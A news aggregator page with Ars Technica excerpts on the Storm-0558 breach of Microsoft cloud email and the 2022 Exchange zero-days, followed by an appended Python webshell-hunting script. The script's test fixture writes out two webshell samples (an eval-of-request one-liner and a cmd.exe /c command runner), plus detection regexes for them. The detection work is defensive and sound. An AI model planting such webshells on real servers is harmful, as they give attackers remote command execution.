      US senator blasts Microsoft for “negligent cybersecurity practices”

      news.movim.eu / ArsTechnica · Thursday, 27 July, 2023 - 20:29

    A US senator is calling on the Justice Department to hold Microsoft responsible for “negligent cybersecurity practices” that enabled Chinese espionage hackers to steal hundreds of thousands of emails from cloud customers, including officials in the US Departments of State and Commerce.

    “Holding Microsoft responsible for its negligence will require a whole-of-government effort,” Ron Wyden (D-Ore.) wrote in a letter. It was sent on Thursday to the heads of the Justice Department, Cybersecurity and Infrastructure Security Agency, and the Federal Trade Commission.

    Bending over backward

    Wyden’s remarks echo those of other critics who say Microsoft is withholding key details about a recent hack. In disclosures involving the incident so far, Microsoft has bent over backwards to avoid saying its infrastructure—including Azure Active Directory, a supposedly fortified part of Microsoft’s cloud offerings that large organizations use to manage single sign-on and multifactor authentication—was breached. The critics have said that details Microsoft has disclosed so far lead to the inescapable conclusion that vulnerabilities in code for Azure AD and other cloud offerings were exploited to pull off the successful hack.

      Microsoft takes pains to obscure role in 0-days that caused email breach

      news.movim.eu / ArsTechnica · Friday, 14 July, 2023 - 22:19 · 1 minute

    On Friday, Microsoft attempted to explain the cause of a breach that gave hackers working for the Chinese government access to the email accounts of 25 of its customers—reportedly including the US Departments of State and Commerce and other sensitive organizations.

    In a post on Friday, the company indicated that the compromise resulted from three exploited vulnerabilities in either its Exchange Online email service or Azure Active Directory, an identity service that manages single sign-on and multifactor authentication for large organizations. Microsoft’s Threat Intelligence team said that Storm-0558, a China-based hacking outfit that conducts espionage on behalf of that country’s government, exploited them starting on May 15. Microsoft drove out the attackers on June 16 after a customer tipped off company researchers of the intrusion.

    Above all else: Avoid the Z-word

    In standard parlance among security professionals, this means that Storm-0558 exploited zero-days in the Microsoft cloud services. A “zero-day” is a vulnerability that is known to or exploited by outsiders before the vendor has a patch for it. To “exploit” a vulnerability means to use code or other means to trigger it in a way that causes harm to the vendor or others.

      High-severity Microsoft Exchange 0-day under attack threatens 220,000 servers

      news.movim.eu / ArsTechnica · Friday, 30 September, 2022 - 20:01

    Microsoft late Thursday confirmed the existence of two critical vulnerabilities in its Exchange application that have already compromised multiple servers and pose a serious risk to an estimated 220,000 more around the world.

    The currently unpatched security flaws have been under active exploit since early August, when Vietnam-based security firm GTSC discovered customer networks had been infected with malicious webshells and that the initial entry point was some sort of Exchange vulnerability. The mystery exploit looked almost identical to an Exchange zero-day from 2021 called ProxyShell, but the customers’ servers had all been patched against the vulnerability, which is tracked as CVE-2021-34473. Eventually, the researchers discovered the unknown hackers were exploiting a new Exchange vulnerability.

    Webshells, backdoors, and fake sites

    “After successfully mastering the exploit, we recorded attacks to collect information and create a foothold in the victim's system,” the researchers wrote in a post published on Wednesday. “The attack team also used various techniques to create backdoors on the affected system and perform lateral movements to other servers in the system.”
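The GTSC finding above started from webshells dropped on patched Exchange servers. An added example, not code from GTSC, Microsoft, or Ars Technica: a small hunt that walks an IIS web root for server-side script files and flags those containing source-level markers that legitimate Exchange pages do not combine (requests fed to `eval`, `Process.Start`, runtime compilation, China Chopper style `Request.Item[...]`). The directory layout, file names, indicator list and sample page contents are all constructed assumptions for the demonstration; real hunts should also compare file hashes against a known-good install and review IIS request logs for the flagged paths.

```python
"""Hunt for ASP.NET webshells under an IIS/Exchange web root.

Added example; not code from the GTSC post or from Microsoft. The
indicator set, directory layout and sample pages are assumptions.
"""
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Constructed indicators: markers a benign Exchange page does not normally
# contain. Each is a named regex so findings explain themselves.
WEBSHELL_INDICATORS = {
    "request_to_eval": re.compile(r"eval\s*\(\s*Request", re.I),
    "process_start": re.compile(r"Process\.Start\s*\(", re.I),
    "cmd_shell": re.compile(r"cmd(\.exe)?\s*/c", re.I),
    "runtime_compile": re.compile(r"CompileAssemblyFromSource|Assembly\.Load\s*\(", re.I),
    "china_chopper_style": re.compile(r"Request\.Item\[", re.I),
    "base64_decode_request": re.compile(r"FromBase64String\s*\(\s*Request", re.I),
}

# Extensions IIS will execute as server-side script.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}


def score_file(path: Path) -> list:
    """Return the names of every indicator that matches the file's contents."""
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return []
    return [name for name, rx in WEBSHELL_INDICATORS.items() if rx.search(text)]


def scan_for_webshells(root, modified_within_days=None):
    """Walk root and return sorted (relative_path, [indicators]) for suspicious script files.

    modified_within_days, when set, restricts the scan to recently changed
    files, which is the usual first pass after an unexplained foothold.
    """
    root = Path(root)
    cutoff = None
    if modified_within_days is not None:
        cutoff = datetime.now(timezone.utc) - timedelta(days=modified_within_days)
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            p = Path(dirpath) / fn
            if p.suffix.lower() not in SCRIPT_EXTENSIONS:
                continue
            if cutoff is not None:
                mtime = datetime.fromtimestamp(p.stat().st_mtime, tz=timezone.utc)
                if mtime < cutoff:
                    continue
            hits = score_file(p)
            if hits:
                findings.append((str(p.relative_to(root)), sorted(hits)))
    return sorted(findings)


def build_sample_webroot():
    """Constructed fixture standing in for an Exchange FrontEnd directory.

    File names and contents are invented for the example; the two 'shells'
    mimic well-known one-liner and command-runner patterns only.
    """
    root = Path(tempfile.mkdtemp(prefix="exchange_frontend_"))
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "ecp").mkdir()
    # Benign page: ordinary server form, no command execution.
    (root / "owa" / "auth" / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<form runat="server">...</form>\n')
    # China Chopper style one-liner: request body passed straight to eval.
    (root / "owa" / "auth" / "pE3Ga7.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>')
    # Command-runner handler: spawns cmd.exe with an attacker-supplied argument.
    (root / "ecp" / "help.ashx").write_text(
        '<%@ WebHandler Language="C#" Class="h" %>\n'
        'using System.Diagnostics;\n'
        'Process.Start("cmd.exe", "/c " + context.Request["c"]);\n')
    # Non-script file with the same strings: IIS will not execute it, so ignored.
    (root / "ecp" / "notes.txt").write_text('Process.Start("cmd.exe", "/c whoami")\n')
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for rel, hits in scan_for_webshells(sample, modified_within_days=7):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real FrontEnd\HttpProxy directory with `modified_within_days` set to the suspected intrusion window; every hit is a file to pull for analysis, not a verdict on its own.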
